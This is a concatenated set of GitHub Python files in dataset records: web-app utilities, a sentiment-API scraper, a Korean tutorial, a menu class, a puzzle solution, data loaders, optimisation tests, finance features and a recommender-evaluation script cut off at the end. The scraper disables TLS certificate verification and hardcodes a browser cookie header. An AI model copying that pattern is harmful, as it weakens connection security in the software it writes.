TIME_YEAR:\n formating_string = \"%Y/%m/%d %H:%M\"\n else:\n formating_string = \"%m/%d/%Y %H:%M\"\n\n return datetime.strptime(webtime, formating_string)\n\n\ndef datetime_to_webpicker(python_time, format=TIME_YEAR):\n \"\"\"\n convert datetime to 'YYYY/MM/DD HH:mm' string\n \"\"\"\n if format == TIME_YEAR:\n formating_string = \"%Y/%m/%d %H:%M\"\n else:\n formating_string = \"%m/%d/%Y %H:%M\"\n\n return datetime.strftime(python_time, formating_string)\n\n\ndef get_state_by_time(python_time):\n \"\"\"\n returns state for rule based on given time\n if given time is in the past returns 2 (withdrawed rule)\n else returns 1\n :param python_time:\n :return: integer rstate\n \"\"\"\n present = datetime.now()\n\n if python_time <= present:\n return 2\n else:\n return 1\n\n\ndef round_to_ten_minutes(python_time):\n \"\"\"\n Round given time to nearest ten minutes\n :param python_time: datetime\n :return: datetime\n \"\"\"\n python_time += timedelta(minutes=5)\n python_time -= timedelta(\n minutes=python_time.minute % 10,\n seconds=python_time.second,\n microseconds=python_time.microsecond,\n )\n\n return python_time\n\n\ndef flash_errors(form):\n \"\"\"\n Flash all error messages\n :param form: WTForm object\n :return: none\n \"\"\"\n for field, errors in form.errors.items():\n for error in errors:\n flash(\n \"Error in the %s field - %s\" % (getattr(form, field).label.text, error)\n )\n\n\ndef active_css_rstate(rtype, rstate):\n \"\"\"\n returns dict with rstates as keys and css class value\n :param rstate: string\n :return: dict\n \"\"\"\n\n return {\n \"active\": \"\",\n \"expired\": \"\",\n \"all\": \"\",\n \"ipv4\": \"\",\n \"ipv6\": \"\",\n \"rtbh\": \"\",\n rtype: \"active\",\n rstate: \"active\",\n }\n\n\ndef get_comp_func(rstate=\"active\"):\n try:\n comp_func = COMP_FUNCS[rstate]\n except IndexError:\n comp_func = None\n except KeyError:\n comp_func = None\n\n return comp_func\n","repo_name":"CESNET/exafs","sub_path":"flowapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"42718478917","text":"# coding: utf-8\n\nimport json\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nheaders = {\n 'Referer': 'https://demo.pingpong.us/sentiment-analyzer/',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Cookie': '_ga=GA1.2.257438808.1602743624; uncode_privacy[consent_types]=%5B%5D; uncodeAI.screen=2560; uncodeAI.images=2880; uncodeAI.css=2560x1080@16.1; _gid=GA1.2.409086791.1603943134; _gat_gtag_UA_142588611_4=1; _gat_gtag_UA_125669591_1=1; tk_ai=woo%3AEXGV4Dr%2BC5Gp6jJPC6ku6V8H'\n}\n\n\ndef get_emotion(query) -> float:\n query = query.encode().decode('utf-8')\n url = 'https://demo.pingpong.us/api/sentiment.php'\n resp = requests.get(url, params={'queries': query}, verify=False, headers=headers)\n try:\n resp_json = resp.json()\n except json.decoder.JSONDecodeError:\n print('[ ERROR ] Json Decode Error')\n print(resp.text)\n\n return 0.0\n\n # For debugging\n # print(resp_json)\n\n try:\n posneg = resp_json[0][1]\n except IndexError:\n print(f'[ ERROR ] Invalid Query ({query})')\n print('└─[ MESSAGE ] Check that query is empty')\n\n return 0.0\n\n model_score = float(posneg.get('model_score'))\n # score = posneg.get('message')\n\n return model_score\n\n\nif __name__ == '__main__':\n print(get_emotion('테스트 테스트 테스트'))\n","repo_name":"ch4n3-yoon/Emotion-Scraper","sub_path":"lib/Emotion.py","file_name":"Emotion.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21796229190","text":"\"\"\"\n함수 정의:\ndef 함수이름(파라미터: 타입, 파라미터2: 타입, ...) -> 리턴타입:\n 함수 기능(body)\n\"\"\"\n\n\ndef subtract(x: int,y: int) -> int:\n return x - y\n\nresult = subtract(5,3)\nprint(result)\n\n# 파이썬은 함수를 호출할 때\n# 함수 파라미터 타입과 리턴 타입을 검사하지 않음!\nresult = subtract(1.1, 0.9)\nprint(result)\n\n\ndef my_sum(numbers: list) -> float:\n \"\"\"\n 숫자(int,float)들이 저장된 리스트를 전달받아서 ,\n 모든 원소들의 합을 리턴하는 함수\n\n :param numbers: 숫자들이 저장된 리스트\n :return: 리스트의 모든 원소들의 합\n \"\"\"\n total = 0\n for i in numbers:\n total += i\n return total\n\na = [1,2,3,4,5]\nprint(my_sum(a))\n\ndef my_mean(numbers: list) -> float:\n \"\"\"\n 숫자들을 저장하는 리스트를 전달받아서,\n 모든 원소들의 평균을 계산해서 리턴하는 함수\n\n :param numbers: 숫자들이 저장된 리스트\n :return: 리스트의 모든 원소들의 평균\n \"\"\"\n\n total = 0\n for i in numbers:\n total += i\n avg = total/len(numbers)\n return avg\n # 간단하게 사용해보자\n # return my_sum(numbers)/len(numbers) --> 이 한문장이면 끝이다.\n\na = my_mean([915,123,483,154])\nprint(a)\n\n# Ctrl 키를 누르고 함수 위에 마우스로 클릭하면 그 함수가 정의되어 있는\n# 부분으로 간다.\n\n\n\n\n\n\n\n","repo_name":"junbyungchan/python","sub_path":"lec03_function/function03.py","file_name":"function03.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25562032820","text":"from typing import Union, Tuple, List, Callable, Literal, Any\nimport math\n\n\nclass Menu:\n # Options should be either of form (option description, Menu of submenu)\n # or (option description, function)\n # The function must require no inputs but can output anything\n # (although the output is expected to be None since it is not captured)\n def __init__(self, options: List[Tuple[str, Union['Menu', Callable[[], Any]]]] = None,\n start_text: Union[str, Callable[[], str]]=None, loop=True):\n if options is None:\n self._options = []\n else:\n self._options: List[Tuple[str, Union['Menu', Callable[[], Any]]]] = options\n self._start_text: Union[str, Callable[[], str]] = start_text\n self._loop = loop\n\n def add_option(self, option: Tuple[str, Union['Menu', Callable[[], Any]]]):\n self._options.append(option)\n\n @staticmethod\n def prompt_integer(lower_bound: Union[int, Literal[-math.inf]], upper_bound: Union[int, Literal[math.inf]]) -> int:\n # Prompts for an integer x, where lower_bound <= x < upper_bound until a valid one is entered\n current = upper_bound\n while current < lower_bound or current >= upper_bound:\n input_string = input()\n try:\n current = int(input_string)\n if current < lower_bound or current >= upper_bound:\n print(\"Invalid number entered. Please try again:\")\n except ValueError:\n print(\"Invalid number entered. Please try again:\")\n\n return current\n\n @staticmethod\n def prompt_float(lower_bound: float, upper_bound: float) -> float:\n # Prompts for a float x, where lower_bound <= x < upper_bound until a valid one is entered\n current = upper_bound\n while current < lower_bound or current >= upper_bound:\n input_string = input()\n try:\n current = float(input_string)\n if current < lower_bound or current >= upper_bound:\n print(\"Invalid number entered. Please try again:\")\n except ValueError:\n print(\"Invalid number entered. Please try again:\")\n return current\n\n def run(self):\n while True:\n if isinstance(self._start_text, str):\n print(self._start_text)\n elif callable(self._start_text):\n print(self._start_text())\n\n print(\"0. Back\")\n\n for i, option in enumerate(self._options):\n print(f\"{i + 1}: {option[0]}\")\n\n chosen_option = Menu.prompt_integer(0, len(self._options) + 1)\n\n if chosen_option == 0:\n break\n\n if isinstance(self._options[chosen_option - 1][1], Menu):\n self._options[chosen_option - 1][1].run()\n else:\n self._options[chosen_option - 1][1]()\n\n if not self._loop:\n break\n","repo_name":"garamlee500/RoutePlanner","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1347521770","text":"import re \n\ndef first_max(list):\n \"\"\" Takes a list of couples (letter, count), \n returns the first one with max count. \"\"\" \n max = 0\n letter = None\n for l, count in list:\n if count > max:\n max = count \n letter = l \n return letter, max \n\ndef get_five_most(s):\n s = sorted(s) \n\n # make a sorted list of (letter, count)\n lastc = None\n count = 0\n hist = [] \n s.append('X')\n for c in s:\n if c == lastc:\n count += 1 \n else:\n if lastc is not None:\n hist.append((lastc, count))\n lastc = c \n count = 1\n hist = sorted(hist)\n\n res = [] \n for i in range(5):\n l, c = first_max(hist)\n hist.remove((l, c)) \n res.append(l) \n\n return res\n \n\ndef is_room(s):\n s = s.strip() \n\n pattern = r'([a-z\\-].*)-([0-9].*)\\[(.*)\\]'\n letters, code, check = re.search(pattern, s).groups()\n\n code = int(code)\n letters = letters.replace('-','')\n five_most = sorted(get_five_most(letters))\n check = sorted(check)\n \n if five_most == check:\n return code \n\n return 0\n\ndef test():\n vals = ['aaaaa-bbb-z-y-x-123[abxyz]',\n 'a-b-c-d-e-f-g-h-987[abcde]',\n 'not-a-real-room-404[oarel]',\n 'totally-real-room-200[decoy]'] \n\n for val in vals:\n print(val, is_room(val))\n\n\n\nsum = 0\nwith open(\"input4.txt\") as file:\n for line in file:\n sum += is_room(line)\n\nprint(sum)\n \n","repo_name":"PetraVidnerova/AdventOfCode2016","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30122605023","text":"import numpy as np\nimport os\nfrom sklearn.preprocessing import normalize\n\ndef load(folder, num=400):\n chimeric, original_chimeric = loadSingleFolder(folder + \"/chimeric\", num)\n repeat, original_repeat = loadSingleFolder(folder + \"/repeat\", num)\n normal, original_normal = loadSingleFolder(folder + \"/normal\", num)\n \n combined = np.array([]).reshape(0, num)\n combined = np.append(combined, chimeric, axis=0)\n combined = np.append(combined, repeat, axis=0)\n combined = np.append(combined, normal, axis=0)\n \n original_combined = original_chimeric + original_repeat + original_normal\n \n original_combined_np = np.array(original_combined)\n \n p = np.random.permutation(len(combined))\n combined = combined[p]\n original_combined_np = original_combined_np[p]\n \n return combined, chimeric, repeat, normal, original_combined_np\n\ndef loadFast(folder, num=250):\n chimeric, original_chimeric = loadSingleFolderFast(folder + \"/chimeric\", num)\n repeat, original_repeat = loadSingleFolderFast(folder + \"/repeat\", num)\n normal, original_normal = loadSingleFolderFast(folder + \"/normal\", num)\n \n combined = np.array([]).reshape(0, num)\n combined = np.append(combined, chimeric, axis=0)\n combined = np.append(combined, repeat, axis=0)\n combined = np.append(combined, normal, axis=0)\n \n original_combined = original_chimeric + original_repeat + original_normal\n original_combined_np = np.array(original_combined)\n \n p = np.random.permutation(len(combined))\n combined = combined[p]\n original_combined_np = original_combined_np[p]\n \n return combined, chimeric, repeat, normal, original_combined_np\n \n\ndef load_test_set(folder, num=400):\n chimeric, _ = loadSingleFolder(folder + \"/chimeric_test\", num)\n left_repeat, _ = loadSingleFolder(folder + \"/left_repeat_test\", num)\n right_repeat, _ = loadSingleFolder(folder + \"/right_repeat_test\", num)\n normal, _ = loadSingleFolder(folder + \"/normal_test\", num)\n \n test_set_list = []\n test_set_list.append(chimeric)\n test_set_list.append(left_repeat)\n test_set_list.append(right_repeat)\n test_set_list.append(normal)\n \n return test_set_list\n \ndef loadSingleFolderFast(folder, num=250):\n result = np.array([]).reshape(0, num)\n original_result = []\n for file in os.listdir(folder):\n original = np.load(folder + \"/\" + file)\n result = np.append(result, normalize(interpolate(original, num)).reshape(1, num), axis=0)\n original_result.append(original)\n return result, original_result\n\n\ndef loadSingleFolder(folder, num=400):\n result = np.array([]).reshape(0, num)\n original_result = []\n for file in os.listdir(folder):\n original = list(np.load(folder + \"/\" + file))\n result = np.append(result, normalize(interpolate(original, num)).reshape(1, num), axis=0)\n original_result.append(original)\n return result, original_result\n\ndef saveResults(save_folder, results, original_data):\n i = 0\n for res in results:\n np.save(save_folder + \"/group_\" + str(res) + \"/number_\" + str(i) + \".npy\", original_data[i])\n i+=1\n\ndef saveTemp(temp_save_folder, data, chimeric, repeat, normal, original_data):\n np.save(temp_save_folder + \"/data.npy\", data)\n np.save(temp_save_folder + \"/chimeric.npy\", chimeric)\n np.save(temp_save_folder + \"/repeat.npy\", repeat)\n np.save(temp_save_folder + \"/normal.npy\", normal)\n np.save(temp_save_folder + \"/original_data.npy\", original_data)\n \ndef loadTemp(temp_save_folder):\n data = np.load(temp_save_folder + \"/data.npy\")\n chimeric = np.load(temp_save_folder + \"/chimeric.npy\")\n repeat = np.load(temp_save_folder + \"/repeat.npy\")\n normal = np.load(temp_save_folder + \"/normal.npy\")\n original_data = np.load(temp_save_folder + \"/original_data.npy\")\n return data, chimeric, repeat, normal, original_data\n\n#interpolation\ndef interpolate(coverage, num=400):\n x = np.linspace(0, 1, num=num)\n xp = np.linspace(0, 1, num=len(coverage))\n return np.interp(x, xp, coverage)\n\ndef f(x, ma, mi):\n return (x-mi) / (ma-mi)\n\ndef normalize(read):\n ma, mi = read.max(), read.min()\n fun = np.vectorize(f)\n return fun(read, ma, mi)","repo_name":"jantomlj/Experimenting-with-signal-clustering","sub_path":"datahandling.py","file_name":"datahandling.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21166137042","text":"# coding: utf-8\n\ndef cleanspace(st):\n return st.replace(' ','').replace('\\n','').replace('\\t','')\n\ndef cvxcomp(A,B):\n return max([abs(v) for v in A-B])\n\nSOLVER = 'cvxopt'\n\n#-------------#\n# print test #\n#-------------#\n\nimport picos as pic\nprint('starting tests with picos'+str(pic.__version__))\n\nprob = pic.Problem()\nx = prob.add_variable('x',1, vtype='integer') #scalar integer variable\nprob.add_constraint(x<5.2) #x less or equal to 5.2\nprob.set_objective('max',x) #maximize x\nassert(cleanspace(str(prob)) == cleanspace(\n '---------------------\\noptimization problem (MIP):\\n1 variables, 1 affine constraints\\n\\nx \\t: (1, 1), integer\\n\\n\\tmaximize x\\nsuch that\\n x < 5.2\\n---------------------'))\n\n\n#--------------------------#\n# optdes example in intro #\n#--------------------------#\n\nimport numpy as np\nimport cvxopt as cvx\n\n#generate data\nA = [ cvx.sparse([[1 ,2 ,0 ],\n [2 ,0 ,0 ]]),\n cvx.sparse([[0 ,2 ,2 ]]),\n cvx.sparse([[0 ,2 ,-1],\n [-1,0 ,2 ],\n [0 ,1 ,0 ]])\n ]\nK = cvx.sparse([[1 ,1 ,1 ],\n [1 ,-5,-5]])\n\n#size of the data\ns = len(A)\nm = A[0].size[0]\nl = [ Ai.size[1] for Ai in A ]\nr = K.size[1]\n\n#creates a problem and the optimization variables\nprob = pic.Problem()\nmu = prob.add_variable('mu',s)\nZ = [prob.add_variable('Z[' + str(i) + ']', (l[i],r))\n for i in range(s)]\n\n#convert the constants into params of the problem\nA = pic.new_param('A',A)\nK = pic.new_param('K',K)\n\n#add the constraints\nprob.add_constraint( pic.sum([ A[i]*Z[i] for i in range(s)], #summands\n 'i', #name of the index\n '[s]' #set to which the index belongs\n ) == K\n )\nprob.add_list_of_constraints( [ abs(Z[i]) < mu[i] for i in range(s)], #constraints\n 'i', #index of the constraints\n '[s]' #set to which the index belongs\n )\n\n#sets the objective\nprob.set_objective('min', 1 | mu ) # scalar product of the vector of all ones with mu\n\n#call to the solver cvxopt\nsol = prob.solve(solver=SOLVER, verbose = 0)\n\nassert( max([abs(v) for v in (mu.value - cvx.matrix([[0.66017],[ 2.4189],[ 0.1640]]).T)]) < 1e-4)\n\nassert(max([abs(v) for v in (prob.get_constraint(0).dual - cvx.matrix([-0.3412770157278555, 0.09164120429815878, -0.18755919557221587, -0.35241708871373845, 0.23181086079278834, 0.2589026387700825]))]) < 1e-5)\n\n#----------------------------#\n# Some tests of the tuto #\n#----------------------------#\n\npairs = [(0,2), (1,4), (1,3), (3,2), (0,4),(2,4)] #a list of pairs\nA = []\nb = ( [0 ,2 ,0 ,3 ], #a tuple of 5 lists, each of length 4\n [1 ,1 ,0 ,5 ],\n [-1,0 ,2 ,4 ],\n [0 ,0 ,-2,-1],\n [1 ,1 ,0 ,0 ]\n )\nfor i in range(5):\n A.append(cvx.matrix(range(i-3,i+5),(2,4))) #A is a list of 2x4 matrices\nD={'Peter': 12,\n 'Bob' : 4,\n 'Betty': 7,\n 'Elisa': 14\n }\nprob = pic.Problem()\nt = prob.add_variable('t',1) #a scalar\nx = prob.add_variable('x',4) #a column vector\nY = prob.add_variable('Y',(2,4)) #a matrix\nZ = []\nfor i in range(5):\n Z.append( prob.add_variable('Z[{0}]'.format(i),(4,2)) )# a list of 5 matrices\nw={}\nfor p in pairs: #a dictionary of (scalar) binary variables, indexed by our pairs\n w[p] = prob.add_variable('w[{0}]'.format(p),1 , vtype='binary')\n\nassert( cleanspace(str(w[2,4])) == cleanspace('# variable w[(2, 4)]:(1 x 1),binary #') )\nassert( cleanspace(str(Y)) == cleanspace('# variable Y:(2 x 4),continuous #') )\nassert( w[2,4].vtype == 'binary')\nassert( x.vtype =='continuous')\nassert(x.size==(4,1))\nassert( not(Z[0].is_valued()))\nZ[1].value = A[0].T\nassert( Z[1].is_valued())\nassert( Z[2].name == 'Z[2]')\n\nAA = pic.new_param('A',A)\nAlpha = pic.new_param('alpha',12)\nalpha = 12\nDD = pic.new_param('D',D)\nbb = pic.new_param('b',b)\nx_minus_1 = x - 1\nassert(cleanspace(str(x_minus_1)) == cleanspace('# (4 x 1)-affine expression: x -|1| #') )\n\n#-----------------------------------#\n# some tests with valued variables #\n#-----------------------------------#\n\nZ[0].value = list(range(0,8))\nZ[1].value = list(range(8,16))\nZ[2].value = list(range(16,24))\nZ[3].value = list(range(24,32))\nZ[4].value = list(range(32,40))\nt.value = -1\nw[0, 2].value = 0\nw[1, 4].value = 0\nw[1, 3].value = 1\nw[3, 2].value = 1\nw[0, 4].value = 0\nw[2, 4].value = 1\nx.value = list(range(-5,-1))\n\nZv = [Zi.eval() for Zi in Z]\ntv = t.value\nwv = pic.tools.eval_dict(w)\nxv = x.value\n\n#left right multiplication\nassert( cvxcomp((AA[1]*Z[0]*AA[2]).value, A[1]*Zv[0]*A[2]) < 1e-6)\n#dot product\nassert( cvxcomp( ( bb[2] | x ).value, bb[2].T.value * xv) < 1e-6 )\n#hadamard\nassert( cvxcomp( (bb[1]^x).value, cvx.matrix([bi*xi for bi,xi in zip(bb[1].value,xv)]) )< 1e-6 )\n#concatenation\nRHS = cvx.matrix([[ 1.00e+00, -1.00e+00, -5.00e+00, -2.20e+01],\n [ 1.00e+00, 0.00e+00, -4.00e+00, -1.00e+01],\n [ 0.00e+00, 2.00e+00, -3.00e+00, 2.00e+00],\n [ 5.00e+00, 4.00e+00, -2.00e+00, 1.40e+01],\n [-5.00e+00, -4.00e+00, -3.00e+00, -2.00e+00]]).T\nassert( cvxcomp(((bb[1] & bb[2] & x & AA[0].T*AA[0]*x) // x.T).value,RHS) < 1e-6)\n\n#sum\nassert(cvxcomp(\n pic.sum([A[i]*Z[i] for i in range(5)],'i','[5]').value,\n sum([A[i]*Zv[i] for i in range(5)])) < 1e-6\n )\n\n#norm\nassert( abs(Z[1]-2*A[0].T).value[0] == np.linalg.norm(Zv[1]-2*A[0].T,'fro'))\n\n#quad\nassert(cvxcomp( (x +2 | Z[1][:,1]).value, (xv+2).T * Zv[1][:,1]) < 1e-6)\n\n#constring\nassert(cleanspace(str(pic.sum([AA[i]*Z[i] for i in range(5)],'i','[5]') == 0))\n == cleanspace(str('# (2x2)-affine constraint: Σ_{i in [5]} A[i]*Z[i] = |0| #'))\n )\n\n\n#cons slacks\nassert( (abs(x) < (2|x-1)).slack[0] == 2*sum(xv-1)- np.linalg.norm(xv))\nassert( (1 < (t-1)*(x[2]+x[3]) ).slack[0] == ((tv-1) * (xv[2]+xv[3])-1)[0])\n\n#powers\nassert((Z[0][4]**(2./3)).value == Zv[0][4]**(2./3))\nassert( cvxcomp(\n ((1-t)**0.6666 > x[0]).slack,\n (1-tv)**0.6666 - xv[0]) < 1e-4)\n\nassert((pic.norm(-x,'inf') < 2).slack[0] == -3)\n\nM = prob.add_variable('M',(5,5),'symmetric')\nM.value = [1+(i+j)+2*(i+j)**2-0.01*(i+j)**4 + (25 if i==j else 0) for i in range(5) for j in range(5)]\nassert( cvxcomp((t < pic.detrootn(M)).slack, np.linalg.det(M.value)**(1./5) - tv[0] ) < 1e-6)\n\n#---------------#\n# Complex SDP #\n#---------------#\n\nP = pic.Problem()\nZ = P.add_variable('Z',(3,2),'complex')\n\nassert(cleanspace(str(Z.real))==cleanspace('# variable Z_RE:(3 x 2),continuous #'))\nassert(cleanspace(str(Z.imag))==cleanspace('# variable Z_IM:(3 x 2),continuous #'))\nassert(Z.vtype == 'complex')\n\nP = cvx.matrix([ [1-1j , 2+2j , 1 ],\n [3j , -2j , -1-1j],\n [1+2j, -0.5+1j, 1.5 ]\n ])\nP = P * P.H\n\nQ = cvx.matrix([ [-1-2j , 2j , 1.5 ],\n [1+2j ,-2j , 2.-3j ],\n [1+2j ,-1+1j , 1+4j ]\n ])\nQ = Q * Q.H\n\nn=P.size[0]\nP = pic.new_param('P',P)\nQ = pic.new_param('Q',Q)\n\n#create the problem in picos\nF = pic.Problem()\nZ = F.add_variable('Z',(n,n),'complex')\n\nF.set_objective('max','I'|0.5*(Z+Z.H)) #('I' | Z.real) works as well\nF.add_constraint(((P & Z) // (Z.H & Q))>>0 )\n\n\nF.solve(solver=SOLVER,verbose = 0)\nassert(abs(F.obj_value()-37.4742)<1e-4)\nsol = cvx.matrix([\n [ 1.51e+01+2.21e+00j, -7.17e+00-1.22e+00j, 2.52e+00+6.87e-01j],\n [-4.88e+00+4.06e+00j, 1.00e+01-1.57e-01j, 8.33e+00+1.13e+01j],\n [-4.32e-01+2.98e-01j, 3.84e+00-3.28e+00j, 1.24e+01-2.05e+00j]]).T\n \n#very coarse test because I just pasted the string repr of the solution\nassert(max([abs(v)/abs(z) for v,z in zip(sol-Z.value,sol)])<0.005)\n\nM = pic.new_param('M',Q)\nn=3\n\nP = pic.Problem()\nU = P.add_variable('U',(n,n),'hermitian')\nP.add_list_of_constraints([U[i,i]==1 for i in range(n)],'i')\nP.add_constraint(U >> 0)\n\nP.set_objective('min', U | M)\nP.solve(solver=SOLVER,verbose=0)\nsolstr = \"\"\"\n[ 1.00e+00-j0.00e+00 9.97e-01-j7.20e-02 -9.22e-01-j3.86e-01]\n[ 9.97e-01+j7.20e-02 1.00e+00-j0.00e+00 -8.92e-01-j4.51e-01]\n[-9.22e-01+j3.86e-01 -8.92e-01+j4.51e-01 1.00e+00-j0.00e+00]\n \"\"\"\n\nassert(cleanspace(str(U))==cleanspace(solstr))\n\nprint('everything seems to work fine')","repo_name":"gsagnol/picos","sub_path":"unitTest/doctest_py3.py","file_name":"doctest_py3.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"48"} +{"seq_id":"30112700375","text":"from datetime import datetime\nfrom sklearn import linear_model\n\n# Read in prices from file\ndef getData(datefile, pricefile):\n dfile = open(datefile, 'r')\n dates = dfile.read().split()\n dfile.close()\n pfile = open(pricefile, 'r')\n prices = pfile.read().split()\n pfile.close()\n for i in range(len(dates)):\n dates[i] = datetime.strptime(dates[i], '%m/%d/%y')\n prices[i] = float(prices[i])\n return (dates, prices)\n\n# Calculate trendline - return a from linear equation y = ax + b\ndef calcTrendline(prices, i, n):\n points = prices[i-n+1:i+1]\n indices = [[index] for index in range(i-n+1, i+1)]\n\n # Do linear regression\n clf = linear_model.LinearRegression()\n clf.fit(indices, points)\n a = clf.coef_[0]\n b = clf.intercept_\n p = clf.predict([[i+1]])\n return a\n\n# Momentum for day i with period n\ndef calcMomentum(prices, i, n):\n return prices[i] - prices[i-n]\n\n# Rate of change for day i with period n\ndef calcROC(prices, i, n):\n return (prices[i] - prices[i-n]) / prices[i-n]\n\n# Calculate %K (helper for stochastic oscillator)\ndef calcK(prices, i, n):\n high = max(prices[i-n:i+1])\n low = min(prices[i-n:i+1])\n return (prices[i] - low) / (high - low) * 100\n\n# Return stochastic signal on day i with period n\ndef calcStochastic(prices, i, n):\n curr_K = calcK(prices, i, n)\n prev_K = calcK(prices, i-1, n)\n curr_D = sum([calcK(prices, i-j, n) for j in range(3)])/3\n prev_D = sum([calcK(prices, i-j-1, n) for j in range(3)])/3\n if prev_D < 20 and curr_K < 20 and prev_K < prev_D \\\n and curr_D < curr_K: return \"Buy\"\n if prev_D > 80 and curr_K > 80 and prev_K > prev_D \\\n and curr_D > curr_K: return \"Sell\"\n return \"Hold\"\n\n# Make feature vector for day i\ndef makeFeatures(prices, i):\n x = []\n y_classify = 1 if prices[i+1] > prices[i] else 0\n y_regression = (prices[i+1] - prices[i]) / prices[i] * 100\n\n # Add trendlines\n arr = [2, 3, 5, 8, 15, 17]\n for n in arr:\n x = x + [calcTrendline(prices, i, n), calcTrendline(prices, i-1, n)]\n \n # Calculate momentum/ROC\n curr_roc = calcROC(prices, i, 1)\n x = x + [curr_roc]\n for n in arr:\n roc = calcROC(prices, i, n)\n x = x + [roc, curr_roc/roc if roc != 0 else curr_roc]\n\n # Add stochastic %K\n x = x + [calcK(prices, i, 14)]\n return (x, y_classify, y_regression)\n","repo_name":"mpotoski/gold","sub_path":"gold.py","file_name":"gold.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"5995344042","text":"\"\"\"\nThis module describes how to manually train and test an algorithm without using\nthe evaluate() function.\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport sys\nimport numpy as np\n\nfrom surprise import KNNBasic\nfrom surprise import KNNBaseline\nfrom surprise import Dataset\nfrom surprise import Reader\nfrom surprise import evaluate\n\nfrom tools.utils import CVScoreTuple\nfrom tools.utils import write2csv\nfrom tools.utils import check_mkdir\nfrom tools import timing as tim\n\nDATASET = 'ml-100k'\n#DATASET = 'ml-1M'\n#DATASET = 'jester-1'\n#DATASET = 'book-crossing'\n\nalgorithm = 'UserKNN-Cosine'\n#algorithm = 'ItemKNN-Cosine'\n#algorithm = 'UserKNN-Pearson'\n#algorithm = 'ItemKNN-Pearson'\n\nbaseline = True\n#baseline = False\n\n\n# Read command line arguments\nif len(sys.argv) > 1:\n print(sys.argv[1])\n print(sys.argv[2])\n print(sys.argv[3])\n \n DATASET = str(sys.argv[1])\n algorithm = str(sys.argv[2])\n if str(sys.argv[3]) == '1':\n baseline = True\n elif str(sys.argv[3]) == '0':\n baseline = False\n else:\n sys.exit('Invalid baseline arg')\n\nfolder = 'KNN_2'\nresult_dir = '.\\\\results\\\\'+ DATASET +'\\\\' + folder + '\\\\'\nmodel_name = algorithm\n\n# check directories for existence (if not exist -> create)\ncheck_mkdir(result_dir)\n\n# Prepare Data\nfiles_dir = '.\\\\data\\\\' + DATASET + '\\\\'\n\nreader = Reader(line_format='user item rating timestamp', sep=' ')\nif DATASET == 'jester-1':\n reader = Reader(line_format='user item rating', sep=' ', rating_scale=(-10, 10))\nif DATASET == 'book-crossing':\n reader = Reader(line_format='user item rating', sep=' ', rating_scale=(1, 10))\n\n# folds_files is a list of tuples containing file paths:\ntrain_file = files_dir + DATASET + '-f%d-train.csv'\ntest_file = files_dir + DATASET + '-f%d-test.csv'\n\nfolds_files = [(train_file % i, test_file % i) for i in (1, 2, 3, 4, 5)]\ndata = Dataset.load_from_folds(folds_files, reader=reader)\n\n\nif model_name == 'UserKNN-Cosine':\n sim_options = {'name': 'cosine',\n 'user_based': True\n }\nif model_name == 'ItemKNN-Cosine':\n sim_options = {'name': 'cosine',\n 'user_based': False # compute similarities between items\n }\nif model_name == 'UserKNN-Pearson':\n sim_options = {'name': 'pearson',\n 'user_based': True\n }\nif model_name == 'ItemKNN-Pearson':\n sim_options = {'name': 'pearson',\n 'user_based': False # compute similarities between items\n }\n\nbsl_options = {'method': 'als',\n 'n_epochs': 10,\n }\n \nif DATASET == 'ml-100k':\n bsl_options.update({'reg_u': 5, 'reg_i':1})\nelif DATASET =='ml-1M':\n bsl_options.update({'reg_u': 5, 'reg_i':1})\nelif DATASET == 'jester-1':\n bsl_options.update({'reg_u': 1, 'reg_i':1})\nelif DATASET == 'book-crossing':\n bsl_options.update({'reg_u': 1, 'reg_i':10})\n \n\nk_params = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n\n#k_params = [1, 3, 5]\n\nprint() \nprint(DATASET)\n\nif baseline:\n model_name = 'basel-' + model_name\n\nscores = list()\nfor k in k_params:\n \n if baseline:\n algo = KNNBaseline(k=k, sim_options=sim_options, bsl_options=bsl_options)\n else: \n algo = KNNBasic(k=k, sim_options=sim_options)\n \n print('K =',k)\n tim.startlog('Training model')\n # Evaluate performances of our algorithm on the dataset.\n result = evaluate(algo, data)\n rmse = result['rmse']\n mae = result['mae']\n time = tim.endlog('Done training model')\n \n params = {'k':k}\n params.update({'sim_options': sim_options})\n if baseline:\n params.update({'bsl_options': bsl_options})\n \n scores.append(CVScoreTuple(\n params,\n np.array(rmse, dtype=np.single).mean(),\n np.array(rmse, dtype=np.single).std(),\n np.array(mae, dtype=np.single).mean(),\n np.array(mae, dtype=np.single).std(),\n np.array(time / 5, dtype=np.single).mean(),\n np.array(rmse),\n np.array(mae)))\n \n write2csv(result_dir + DATASET + '_' + model_name + '_score_log.txt', scores)\n scores_sorted = sorted(scores, key=lambda x: x.mean_validation_score)\n write2csv(result_dir + DATASET + '_' + model_name + '_score_sorted_log.txt', scores_sorted)\n \nprint('Finished', model_name, 'on', 